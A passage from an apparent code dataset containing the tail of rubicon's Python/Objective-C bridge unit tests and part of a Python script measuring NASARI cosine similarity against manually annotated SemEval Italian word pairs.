core_foundation.at(pystring)\n buf = create_string_buffer(len(pybytestring) + 1)\n usedLength = NSUInteger()\n remaining = NSRange(0, 0)\n nsstring.getBytes(\n buf,\n maxLength=32,\n usedLength=byref(usedLength),\n encoding=4, # NSUTF8StringEncoding\n options=0,\n range=NSRange(0, 7),\n remainingRange=byref(remaining),\n )\n self.assertEqual(buf.value.decode(\"utf-8\"), pystring)\n\n def test_duplicate_class_registration(self):\n \"If you define a class name twice in the same runtime, you get an error.\"\n\n NSObject = ObjCClass('NSObject')\n\n # First definition should work.\n class MyClass(NSObject):\n pass\n\n # Second definition will raise an error.\n # Without protection, this is a segfault.\n with self.assertRaises(RuntimeError):\n class MyClass(NSObject):\n pass\n\n def test_interface(self):\n \"An ObjC protocol implementation can be defined in Python.\"\n\n results = {}\n\n NSObject = ObjCClass('NSObject')\n\n class Handler(NSObject):\n @objc_method\n def initWithValue_(self, value: int):\n self.value = value\n return self\n\n @objc_method\n def peek_withValue_(self, example, value: int) -> None:\n results['string'] = example.toString() + \" peeked\"\n results['int'] = value + self.value\n\n @objc_method\n def poke_withValue_(self, example, value: int) -> None:\n results['string'] = example.toString() + \" poked\"\n results['int'] = value + self.value\n\n @objc_method\n def reverse_(self, input):\n return ''.join(reversed(input))\n\n @objc_method\n def message(self):\n return \"Alea iacta est.\"\n\n @objc_classmethod\n def fiddle_(cls, value: int) -> None:\n results['string'] = \"Fiddled with it\"\n results['int'] = value\n\n # Create two handler instances so we can check the right one\n # is being invoked.\n 
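        # Note (added): rubicon exposes Objective-C selectors as Python
        # attributes by replacing each colon with a trailing underscore,
        # which is why initWithValue: is invoked as initWithValue_() below.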
handler1 = Handler.alloc().initWithValue_(5)\n handler2 = Handler.alloc().initWithValue_(10)\n\n # Create an Example object, and register a handler with it.\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n example.callback = handler2\n\n # Check some Python-side attributes\n self.assertEqual(handler1.value, 5)\n self.assertEqual(handler2.value, 10)\n\n # Invoke the callback; check that the results have been peeked as expected\n example.testPeek_(42)\n\n self.assertEqual(results['string'], 'This is an ObjC Example object peeked')\n self.assertEqual(results['int'], 52)\n\n example.testPoke_(37)\n\n self.assertEqual(results['string'], 'This is an ObjC Example object poked')\n self.assertEqual(results['int'], 47)\n\n self.assertEqual(example.getMessage(), 'Alea iacta est.')\n\n self.assertEqual(example.reverseIt_('Alea iacta est.'), '.tse atcai aelA')\n\n Handler.fiddle_(99)\n\n self.assertEqual(results['string'], 'Fiddled with it')\n self.assertEqual(results['int'], 99)\n\n def test_class_properties(self):\n \"A Python class can have ObjC properties with synthesized getters and setters.\"\n\n NSObject = ObjCClass('NSObject')\n NSURL = ObjCClass('NSURL')\n\n class URLBox(NSObject):\n\n # takes no type: All properties are pointers\n url = objc_property()\n\n @objc_method\n def getSchemeIfPresent(self):\n if self.url is not None:\n return self.url.scheme\n return None\n\n box = URLBox.alloc().init()\n\n # Default property value is None\n self.assertIsNone(box.url)\n\n # Assign an object via synthesized property setter and call method that uses synthesized property getter\n url = NSURL.alloc().initWithString_('https://www.google.com')\n box.url = url\n self.assertEqual(box.getSchemeIfPresent(), 'https')\n\n # Assign None to dealloc property and see if method returns expected None\n box.url = None\n self.assertIsNone(box.getSchemeIfPresent())\n\n # Try composing URLs using constructors\n base = NSURL.URLWithString('https://pybee.org')\n full = NSURL.URLWithString('contributing/', relativeToURL=base)\n\n self.assertEqual(\n \"Visit %s for details\" % full.absoluteURL,\n \"Visit https://pybee.org/contributing/ for details\"\n )\n\n def test_class_with_wrapped_methods(self):\n \"\"\"An ObjCClass can have wrapped methods.\"\"\"\n\n def deco(f):\n @functools.wraps(f)\n def _wrapper(*args, **kwargs):\n return f(*args, **kwargs)\n return _wrapper\n\n class SimpleMath(NSObject):\n @objc_method\n @deco\n def addOne_(self, num: c_int) -> c_int:\n return num + 1\n\n @objc_classmethod\n @deco\n def subtractOne_(cls, num: c_int) -> c_int:\n return num - 1\n\n simplemath = SimpleMath.alloc().init()\n self.assertEqual(simplemath.addOne_(254), 255)\n self.assertEqual(SimpleMath.subtractOne_(75), 74)\n\n def test_function_NSEdgeInsetsMake(self):\n \"Python can invoke NSEdgeInsetsMake to create NSEdgeInsets.\"\n\n insets = NSEdgeInsets(0.0, 1.1, 2.2, 3.3)\n other_insets = NSEdgeInsetsMake(0.0, 1.1, 2.2, 3.3)\n\n # structs are NOT equal\n self.assertNotEqual(insets, other_insets)\n\n # but their values are\n self.assertEqual(insets.top, other_insets.top)\n self.assertEqual(insets.left, other_insets.left)\n self.assertEqual(insets.bottom, other_insets.bottom)\n self.assertEqual(insets.right, other_insets.right)\n\n def test_cfstring_to_str(self):\n \"CFString/NSString instances can be converted to Python str.\"\n\n self.assertEqual(str(core_foundation.at(\"abcdef\")), \"abcdef\")\n\n def test_objc_const(self):\n \"objc_const works.\"\n \n string_const = objc_const(rubiconharness, 
\"SomeGlobalStringConstant\")\n self.assertEqual(str(string_const), \"Some global string constant\")\n\n\nclass NSArrayMixinTest(unittest.TestCase):\n nsarray = ObjCClass('NSArray')\n nsmutablearray = ObjCClass('NSMutableArray')\n\n py_list = ['one', 'two', 'three']\n\n def make_array(self, contents=None):\n a = self.nsmutablearray.alloc().init()\n if contents is not None:\n for value in contents:\n a.addObject(value)\n\n return self.nsarray.arrayWithArray(a)\n\n def test_getitem(self):\n a = self.make_array(self.py_list)\n\n for pos, value in enumerate(self.py_list):\n self.assertEqual(a[pos], value)\n\n with self.assertRaises(IndexError):\n a[len(self.py_list) + 10]\n\n def test_len(self):\n a = self.make_array(self.py_list)\n\n self.assertEqual(len(a), len(self.py_list))\n\n def test_iter(self):\n a = self.make_array(self.py_list)\n\n keys = list(self.py_list)\n for k in a:\n self.assertTrue(k in keys)\n keys.remove(k)\n\n self.assertTrue(len(keys) == 0)\n\n def test_contains(self):\n a = self.make_array(self.py_list)\n for value in self.py_list:\n self.assertTrue(value in a)\n\n def test_index(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.index('two'), 1)\n with self.assertRaises(ValueError):\n a.index('umpteen')\n\n def test_count(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.count('one'), 1)\n\n def test_copy(self):\n a = self.make_array(self.py_list)\n b = a.copy()\n self.assertEqual(b, a)\n self.assertEqual(b, self.py_list)\n\n with self.assertRaises(AttributeError):\n b.append('four')\n\n def test_equivalence(self):\n a = self.make_array(self.py_list)\n b = self.make_array(self.py_list)\n\n self.assertEqual(a, self.py_list)\n self.assertEqual(b, self.py_list)\n self.assertEqual(a, b)\n self.assertEqual(self.py_list, a)\n self.assertEqual(self.py_list, b)\n self.assertEqual(b, a)\n\n def test_slice_access(self):\n a = self.make_array(self.py_list * 2)\n self.assertEqual(a[1:4], ['two', 'three', 'one'])\n self.assertEqual(a[:-2], ['one', 'two', 'three', 'one'])\n self.assertEqual(a[4:], ['two', 'three'])\n self.assertEqual(a[1:5:2], ['two', 'one'])\n\n\nclass NSMutableArrayMixinTest(NSArrayMixinTest):\n def make_array(self, contents=None):\n a = self.nsmutablearray.alloc().init()\n if contents is not None:\n for value in contents:\n a.addObject(value)\n\n return a\n\n def test_setitem(self):\n a = self.make_array(self.py_list)\n\n a[2] = 'four'\n self.assertEqual(a[2], 'four')\n\n def test_del(self):\n a = self.make_array(self.py_list)\n del a[0]\n self.assertEqual(len(a), 2)\n self.assertEqual(a[0], 'two')\n\n def test_append(self):\n a = self.make_array()\n a.append('an item')\n self.assertTrue('an item' in a)\n\n def test_extend(self):\n a = self.make_array()\n a.extend(['an item', 'another item'])\n self.assertTrue('an item' in a)\n self.assertTrue('another item' in a)\n\n def test_clear(self):\n a = self.make_array(self.py_list)\n a.clear()\n self.assertEqual(len(a), 0)\n\n def test_count(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.count('one'), 1)\n\n a.append('one')\n self.assertEqual(a.count('one'), 2)\n\n def test_copy(self):\n a = self.make_array(self.py_list)\n b = a.copy()\n self.assertEqual(b, a)\n self.assertEqual(b, self.py_list)\n\n b.append('four')\n\n def test_insert(self):\n a = self.make_array(self.py_list)\n a.insert(1, 'four')\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[1], 'four')\n self.assertEqual(a[2], 'two')\n\n def test_pop(self):\n a = self.make_array(self.py_list)\n 
self.assertEqual(a.pop(), 'three')\n self.assertEqual(a.pop(0), 'one')\n self.assertEqual(len(a), 1)\n self.assertEqual(a[0], 'two')\n\n def test_remove(self):\n a = self.make_array(self.py_list)\n a.remove('three')\n self.assertEqual(len(a), 2)\n self.assertEqual(a[-1], 'two')\n with self.assertRaises(ValueError):\n a.remove('umpteen')\n\n def test_slice_assignment1(self):\n a = self.make_array(self.py_list * 2)\n a[2:4] = ['four', 'five']\n self.assertEqual(a, ['one', 'two', 'four', 'five', 'two', 'three'])\n\n def test_slice_assignment2(self):\n a = self.make_array(self.py_list * 2)\n a[::2] = ['four', 'five', 'six']\n self.assertEqual(a, ['four', 'two', 'five', 'one', 'six', 'three'])\n\n def test_slice_assignment3(self):\n a = self.make_array(self.py_list * 2)\n a[2:4] = ['four']\n self.assertEqual(a, ['one', 'two', 'four', 'two', 'three'])\n\n def test_bad_slice_assignment1(self):\n a = self.make_array(self.py_list * 2)\n\n with self.assertRaises(TypeError):\n a[2:4] = 4\n\n def test_bad_slice_assignment2(self):\n a = self.make_array(self.py_list * 2)\n\n with self.assertRaises(ValueError):\n a[::2] = [4]\n\n def test_del_slice1(self):\n a = self.make_array(self.py_list * 2)\n del a[-2:]\n self.assertEqual(len(a), 4)\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[-1], 'one')\n\n def test_del_slice2(self):\n a = self.make_array(self.py_list * 2)\n del a[::2]\n self.assertEqual(len(a), 3)\n self.assertEqual(a[0], 'two')\n self.assertEqual(a[1], 'one')\n self.assertEqual(a[2], 'three')\n\n def test_del_slice3(self):\n a = self.make_array(self.py_list * 2)\n del a[::-2]\n self.assertEqual(len(a), 3)\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[1], 'three')\n self.assertEqual(a[2], 'two')\n\n def test_reverse(self):\n a = self.make_array(self.py_list)\n a.reverse()\n\n for pos, value in enumerate(reversed(self.py_list)):\n self.assertEqual(a[pos], value)\n\n\nclass NSDictionaryMixinTest(unittest.TestCase):\n nsdict = ObjCClass('NSDictionary')\n nsmutabledict = ObjCClass('NSMutableDictionary')\n\n py_dict = {\n 'one': 'ONE',\n 'two': 'TWO',\n 'three': 'THREE',\n }\n\n def make_dictionary(self, contents=None):\n d = self.nsmutabledict.alloc().init()\n if contents is not None:\n for key, value in contents.items():\n d.setObject_forKey_(value, key)\n\n return self.nsdict.dictionaryWithDictionary(d)\n\n def test_getitem(self):\n d = self.make_dictionary(self.py_dict)\n\n for key, value in self.py_dict.items():\n self.assertEqual(d[key], value)\n\n with self.assertRaises(KeyError):\n d['NO SUCH KEY']\n\n def test_iter(self):\n d = self.make_dictionary(self.py_dict)\n\n keys = set(self.py_dict)\n for k in d:\n self.assertTrue(k in keys)\n keys.remove(k)\n\n self.assertTrue(len(keys) == 0)\n\n def test_len(self):\n d = self.make_dictionary(self.py_dict)\n self.assertEqual(len(d), len(self.py_dict))\n\n def test_get(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.get('one'), 'ONE')\n self.assertEqual(d.get('two', None), 'TWO')\n self.assertEqual(d.get('four', None), None)\n self.assertEqual(d.get('five', 5), 5)\n self.assertEqual(d.get('six', None), None)\n\n def test_contains(self):\n d = self.make_dictionary(self.py_dict)\n for key in self.py_dict:\n self.assertTrue(key in d)\n\n def test_copy(self):\n d = self.make_dictionary(self.py_dict)\n e = d.copy()\n self.assertEqual(e, d)\n self.assertEqual(e, self.py_dict)\n\n with self.assertRaises(TypeError):\n e['four'] = 'FOUR'\n\n def test_keys(self):\n a = self.make_dictionary(self.py_dict)\n for k1, k2 in 
zip(sorted(a.keys()), sorted(self.py_dict.keys())):\n self.assertEqual(k1, k2)\n\n def test_values(self):\n a = self.make_dictionary(self.py_dict)\n for v1, v2 in zip(sorted(a.values()), sorted(self.py_dict.values())):\n self.assertEqual(v1, v2)\n\n def test_items(self):\n d = self.make_dictionary(self.py_dict)\n for i1, i2 in zip(sorted(d.items()), sorted(self.py_dict.items())):\n self.assertEqual(i1[0], i2[0])\n self.assertEqual(i1[1], i2[1])\n\nclass NSMutableDictionaryMixinTest(NSDictionaryMixinTest):\n def make_dictionary(self, contents=None):\n d = self.nsmutabledict.alloc().init()\n if contents is not None:\n for key, value in contents.items():\n d.setObject_forKey_(value, key)\n\n return d\n\n def test_setitem(self):\n d = self.make_dictionary()\n for key, value in self.py_dict.items():\n d[key] = value\n\n for key, value in self.py_dict.items():\n self.assertEqual(d[key], value)\n\n def test_del(self):\n d = self.make_dictionary(self.py_dict)\n del d['one']\n self.assertEqual(len(d), 2)\n with self.assertRaises(KeyError):\n d['one']\n\n def test_clear(self):\n d = self.make_dictionary(self.py_dict)\n d.clear()\n self.assertEqual(len(d), 0)\n\n def test_copy(self):\n d = self.make_dictionary(self.py_dict)\n e = d.copy()\n self.assertEqual(e, d)\n self.assertEqual(e, self.py_dict)\n\n e['four'] = 'FOUR'\n\n def test_pop1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.pop('one'), 'ONE')\n self.assertEqual(len(d), 2)\n with self.assertRaises(KeyError):\n d['one']\n\n def test_pop2(self):\n d = self.make_dictionary(self.py_dict)\n\n with self.assertRaises(KeyError):\n d.pop('four')\n\n def test_pop3(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.pop('four', 4), 4)\n\n def test_popitem(self):\n d = self.make_dictionary(self.py_dict)\n\n keys = set(self.py_dict)\n\n while len(d) > 0:\n key, value = d.popitem()\n self.assertTrue(key in keys)\n self.assertEqual(value, self.py_dict[key])\n self.assertTrue(key not in d)\n\n def test_setdefault1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.setdefault('one', 'default'), 'ONE')\n self.assertEqual(len(d), len(self.py_dict))\n\n def test_setdefault2(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertTrue('four' not in d)\n self.assertEqual(d.setdefault('four', 'FOUR'), 'FOUR')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n self.assertEqual(d['four'], 'FOUR')\n\n def test_setdefault3(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertTrue('four' not in d)\n self.assertEqual(d.setdefault('four'), None)\n self.assertEqual(len(d), len(self.py_dict))\n with self.assertRaises(KeyError):\n d['four']\n\n def test_update1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d, self.py_dict)\n d.update({'one': 'two', 'three': 'four', 'four': 'FIVE'})\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(d['four'], 'FIVE')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n def test_update2(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d, self.py_dict)\n d.update([('one', 'two'), ('three', 'four'), ('four', 'FIVE')])\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n def test_update3(self):\n d = self.make_dictionary(self.py_dict)\n\n 
self.assertEqual(d, self.py_dict)\n d.update(one='two', three='four', four='FIVE')\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(d['four'], 'FIVE')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n\nclass BlockTests(unittest.TestCase):\n def test_block_property_ctypes(self):\n BlockPropertyExample = ObjCClass(\"BlockPropertyExample\")\n instance = BlockPropertyExample.alloc().init()\n result = ObjCBlock(instance.blockProperty, c_int, c_int, c_int)(1, 2)\n self.assertEqual(result, 3)\n\n def test_block_property_pytypes(self):\n BlockPropertyExample = ObjCClass(\"BlockPropertyExample\")\n instance = BlockPropertyExample.alloc().init()\n result = ObjCBlock(instance.blockProperty, int, int, int)(1, 2)\n self.assertEqual(result, 3)\n\n def test_block_delegate_method_manual_ctypes(self):\n class DelegateManualC(NSObject):\n @objc_method\n def exampleMethod_(self, block):\n ObjCBlock(block, c_void_p, c_int, c_int)(2, 3)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateManualC.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 5)\n\n def test_block_delegate_method_manual_pytypes(self):\n class DelegateManualPY(NSObject):\n @objc_method\n def exampleMethod_(self, block):\n ObjCBlock(block, None, int, int)(2, 3)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateManualPY.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 5)\n\n def test_block_delegate_auto(self):\n class DelegateAuto(NSObject):\n @objc_method\n def exampleMethod_(self, block: objc_block):\n block(4, 5)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateAuto.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 9)\n\n def test_block_delegate_auto_struct(self):\n class BlockStruct(Structure):\n _fields_ = [\n ('a', c_int),\n ('b', c_int),\n ]\n class DelegateAutoStruct(NSObject):\n @objc_method\n def structBlockMethod_(self, block: objc_block) -> int:\n return block(BlockStruct(42, 43))\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateAutoStruct.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.structBlockExample()\n self.assertEqual(result, 85)\n\n def test_block_receiver(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n\n values = []\n\n def block(a: int, b: int) -> None:\n values.append(a + b)\n instance.receiverMethod_(block)\n\n self.assertEqual(values, [27])\n\n def test_block_receiver_unannotated(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n\n def block(a, b):\n return a + b\n with self.assertRaises(ValueError):\n instance.receiverMethod_(block)\n\n def test_block_receiver_lambda(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n with self.assertRaises(ValueError):\n instance.receiverMethod_(lambda a, b: a + b)\n\n def test_block_receiver_explicit(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = 
BlockReceiverExample.alloc().init()\n\n        values = []\n\n        block = Block(lambda a, b: values.append(a + b), None, int, int)\n        instance.receiverMethod_(block)\n\n        self.assertEqual(values, [27])\n\n    def test_block_round_trip(self):\n        BlockRoundTrip = ObjCClass(\"BlockRoundTrip\")\n        instance = BlockRoundTrip.alloc().init()\n\n        def block(a: int, b: int) -> int:\n            return a + b\n\n        returned_block = instance.roundTrip_(block)\n        self.assertEqual(returned_block(8, 9), 17)\n","sub_path":"tests/test_rubicon.py","file_name":"test_rubicon.py","file_ext":"py","file_size_in_byte":45211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"329429796","text":"import hashlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.stats import pearsonr\nfrom scipy.stats.stats import spearmanr\n\nSEMEVAL_ANNOTADED_FILE = \"./semval_utils/it.test.data.annotated.tsv\"\nNASARI_PATH = \"./semval_utils/mini_NASARI.tsv\"\nSENSES2SYNSETS_PATH = \"semval_utils\\SemEval17_IT_senses2synsets.txt\"\nSEMEVAL_ANNOTADED_FILE_CONSEGNA2 = \"./semval_utils/it.test.data.annotated.consegna2.tsv\"\n#NASARI_PATH_TERMS = \"./summarizerutils/dd-small-nasari-15.txt\"\nNASARI_PATH_TERMS = \"./summarizerutils/dd-nasari.txt\"\n\ndef get_range(surname):\n    nof_elements = 500\n    base_idx = (abs(int(hashlib.sha512(surname.encode('utf-8')).hexdigest(), 16)) % 10)\n    idx_intervallo = base_idx * 50+1\n    return idx_intervallo\n\n#read the manually annotated file and return a dataframe\ndef readAnnotatedCouples():\n    return pd.read_csv(SEMEVAL_ANNOTADED_FILE, sep='\t', names=['first','second','score'])\n\ndef read_nasari():\n    nasari_df = pd.read_csv(NASARI_PATH, sep='$', names=['babel'])#fake separator\n    nasari_df[['babel','terms']] = nasari_df[\"babel\"].str.split(\"\t\", 1, expand=True)\n    nasari_df[['babel','lemma']] = nasari_df[\"babel\"].str.split(\"__\", 1, expand=True)\n    nasari_df['lemma'] = nasari_df['lemma'].str.lower()\n    return nasari_df\n\n#extract the terms (embeddings) coming from each babel id in the topic array\n#returns an array of arrays (one per babel id)\ndef getTermsFromBabelIds(topic, nasari_df):\n    if len(topic)==0:\n        return list()\n    nasari_vect = []\n    for single_topic in topic:\n        nasari_terms = nasari_df.loc[nasari_df[nasari_df.columns[0]] == single_topic]['terms'].tolist()\n        if len(nasari_terms) == 0:\n            #nasari_vect.append([])\n            continue\n        else:\n            nasari_vect.append(nasari_terms[0].split(\"\t\"))\n    return nasari_vect\n\n#return a dict {term: [babel synsets]}\ndef read_sense2synset():\n    dict_to_ret = {}\n    temp_synset_list = []\n    last_term_seen = None\n    first = True\n    with open(SENSES2SYNSETS_PATH,encoding=\"utf-8\") as f:\n        while True:\n            line = f.readline().strip('\\n')\n            if not line: \n                break\n            if line.startswith('#'):#it is a term\n                if first:\n                    last_term_seen = line[1:]\n                    first = False\n                else:\n                    dict_to_ret[last_term_seen] = temp_synset_list.copy()\n                    temp_synset_list.clear()\n                    last_term_seen = line[1:]\n            else:#it is a babel synset\n                temp_synset_list.append(line)\n\n    return dict_to_ret\n\n#retrieve babel synsets terms related to columns first and second of annotated_couples dataframe\ndef getBabelTerms(annotated_couples):\n    babel_term_synset_mapper = read_sense2synset()\n    nasari_df = read_nasari()\n    annotated_couples['first_syn_terms_embed'] = None\n    annotated_couples['second_syn_terms_embed'] = None\n    for i in annotated_couples.index:\n        term1 = annotated_couples.iloc[i, :]['first']\n        if term1 not in babel_term_synset_mapper:\n            continue\n        first_syns = 
babel_term_synset_mapper[term1]\n        first_syn_terms = getTermsFromBabelIds(first_syns,nasari_df)\n\n        if len(first_syn_terms) == 0:\n            continue\n\n        term2 = annotated_couples.iloc[i, :]['second']\n        if term2 not in babel_term_synset_mapper:\n            continue\n        second_syns = babel_term_synset_mapper[term2]\n        second_syn_terms = getTermsFromBabelIds(second_syns,nasari_df)\n\n        if len(second_syn_terms) == 0:\n            continue\n\n        annotated_couples.at[i, 'first_syn_terms_embed'] = first_syn_terms\n        annotated_couples.at[i, 'second_syn_terms_embed'] = second_syn_terms\n\n    return annotated_couples,babel_term_synset_mapper\n\ndef cosine_similarity(x, y):\n    x = [float(i) for i in x]\n    y = [float(i) for i in y]\n    return np.dot(x, y) / (np.sqrt(np.dot(x, x)) * np.sqrt(np.dot(y, y)))\n\n#calculate max cosine similarity between first_syn_terms_embed and second_syn_terms_embed\n#sens2syn_dict = a dict {term: [babel synsets]}\ndef calculateNasariSimilarity(babelTerms,sens2syn_dict):\n    babelTerms['nasari_cosin_similarity'] = None\n    babelTerms['most_similar_syn1'] = None\n    babelTerms['most_similar_syn2'] = None\n    for i in babelTerms.index:\n        first_syn_terms_embed = babelTerms.iloc[i, :]['first_syn_terms_embed']\n        second_syn_terms_embed = babelTerms.iloc[i, :]['second_syn_terms_embed']\n        maxSim = -100\n        idx_max_synset1 = 0 #index of the 'first' babel synset that maximizes the similarity\n        idx_max_synset2 = 0 #index of the 'second' babel synset that maximizes the similarity\n        if (first_syn_terms_embed is None) or (second_syn_terms_embed is None):\n            continue\n\n        tmp_idx1 = 0\n        tmp_idx2 = 0\n        for term in first_syn_terms_embed:\n            tmp_idx2 = 0\n            for term2 in second_syn_terms_embed:\n                sim = cosine_similarity(term,term2)\n                if sim > maxSim:\n                    maxSim = sim\n                    idx_max_synset1 = tmp_idx1\n                    idx_max_synset2 = tmp_idx2\n                tmp_idx2+=1\n            tmp_idx1+=1\n\n        babelTerms.at[i, 'nasari_cosin_similarity'] = maxSim\n        babelTerms.at[i, 'most_similar_syn1'] = sens2syn_dict[babelTerms.iloc[i, :]['first']][idx_max_synset1]\n        babelTerms.at[i, 'most_similar_syn2'] = sens2syn_dict[babelTerms.iloc[i, :]['second']][idx_max_synset2]\n\n    return babelTerms\n\ndef printSpearmanPearson(list1, list2):\n\n    #removing None similarity from list2\n    res = [i for i in range(len(list2)) if list2[i] is None]\n    print(res)\n    for indexNone in sorted(res, reverse=True):\n        del list1[indexNone]\n        del list2[indexNone]\n\n    print(\"pearson: \",pearsonr(list1,list2))\n    print(\"spearman: \",spearmanr(list1,list2))\n\ndef consegna1():\n    input_name = \"Coluccia\"\n\n    values = []\n    sx = get_range(input_name)\n    values.append(sx)\n    dx = sx+50-1\n    intervallo = \"\" + str(sx) + \"-\" + str(dx)\n    print('{:15}:\tpairs in interval {}'.format(input_name, intervallo))\n\n    annotated_couples = readAnnotatedCouples()\n    annotated_couples['score'] = pd.to_numeric(annotated_couples['score'], errors='ignore')\n    #normalize the manually annotated score\n    annotated_couples['score']=(annotated_couples['score']-annotated_couples['score'].min())/(annotated_couples['score'].max()-annotated_couples['score'].min())\n    #print(annotated_couples)\n    babelTerms,sens2syn_dict = getBabelTerms(annotated_couples)\n    #print(babelTerms)\n    nasari_sim = calculateNasariSimilarity(babelTerms,sens2syn_dict)\n    print(nasari_sim)\n    printSpearmanPearson(annotated_couples['score'].tolist(),nasari_sim['nasari_cosin_similarity'].tolist())\n    #the coefficients do not show a strong correlation --> in my opinion because some scores are very far apart (especially the ones I set to 0 or 4)\n    return nasari_sim #needed for part 2 (consegna2)
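# Worked example for the cosine_similarity() defined above (added note; the
# components may be strings, since the function converts each one with float()):
#   x = ['1', '0'], y = ['1', '1']
#   dot(x, y) = 1.0, |x| = 1.0, |y| = sqrt(2)
#   cosine_similarity(x, y) = 1.0 / sqrt(2) ~= 0.7071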
\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n\ndef readNasariDfTerms():\n NASARI_DF = pd.read_csv(NASARI_PATH_TERMS, sep='$', names=['babel'])#fake separator\n NASARI_DF[['babel','terms']] = NASARI_DF[\"babel\"].str.split(\";\", 1, expand=True)\n NASARI_DF[['lemma','terms']] = NASARI_DF[\"terms\"].str.split(\";\", 1, expand=True)\n NASARI_DF['lemma'] = NASARI_DF['lemma'].str.lower()\n return NASARI_DF\n\ndef getTermsFromBabelIds_consegna2(single_topic,nasaridf):\n nasari_terms = nasaridf.loc[nasaridf[nasaridf.columns[0]] == single_topic]['terms'].tolist()\n \n nasari_terms_filtered = []\n for term in nasari_terms:\n if term is None:\n continue\n words = term.split(';')\n #words.pop(0)#remove first\n for word in words:\n if word == \"\":\n continue\n splitted = word.split(\"_\")\n if len(splitted) < 2:\n continue\n #print(splitted)\n nasari_terms_filtered.append(splitted[0])\n return nasari_terms_filtered\n\n#it returns a dataframe with this structure: 'term1','term2','babel1','babel2','terms_in_bs1', 'terms_in_bs2'\ndef readSynsetManuallyAnnotated():\n df = pd.read_csv(SEMEVAL_ANNOTADED_FILE_CONSEGNA2, sep='\t', names=['first','second','babel1','babel2'])\n df['terms_in_bs1'] = None\n df['terms_in_bs2'] = None\n\n nasari_df = readNasariDfTerms()\n\n for i in df.index:\n babel1 = df.iloc[i, :]['babel1']\n babel2 = df.iloc[i, :]['babel2']\n if babel1 is None:\n continue\n first_syn_terms = getTermsFromBabelIds_consegna2(babel1,nasari_df)\n\n if babel2 is None:\n continue\n second_syn_terms = getTermsFromBabelIds_consegna2(babel2,nasari_df)\n\n df.at[i, 'terms_in_bs1'] = first_syn_terms\n df.at[i, 'terms_in_bs2'] = second_syn_terms\n return df\n\ndef calculateBestSimilarityNasariSynset(annotated_df):\n #remove rows where at least one of the babel_terms list is empty\n filtered_df = annotated_df[(annotated_df.terms_in_bs1.map(len) > 0) & (annotated_df.terms_in_bs2.map(len) > 0)]\n filtered_df = filtered_df.reset_index()\n #print(filtered_df)\n #read nasari embed\n #nasari_df = read_nasari()\n\n #read sense2synset\n #babel_term_synset_mapper = read_sense2synset()\n\n filtered_df['first_syn_terms_embed'] = None\n filtered_df['second_syn_terms_embed'] = None\n\n #calculate cosine similarity for each row\n for i in filtered_df.index:\n #get embedded\n filtered_df,sens2syn_dict = getBabelTerms(filtered_df)\n nasari_sim_df = calculateNasariSimilarity(filtered_df,sens2syn_dict)\n #print(nasari_sim_df)\n #calculate accuracy over first babel\n most_similar_syn1 = nasari_sim_df['most_similar_syn1'].tolist()\n babel1 = nasari_sim_df['babel1'].tolist()\n correct = 0\n index = 0\n for nasari_babel in most_similar_syn1:\n my_babel = babel1[index]\n if nasari_babel == my_babel:\n correct+=1\n index+=1\n print(\"Accuracy over first babel: \",correct/len(most_similar_syn1))\n #calculate accuracy over second babel\n most_similar_syn2 = nasari_sim_df['most_similar_syn2'].tolist()\n babel2 = nasari_sim_df['babel2'].tolist()\n correct = 0\n index = 0\n for nasari_babel in 
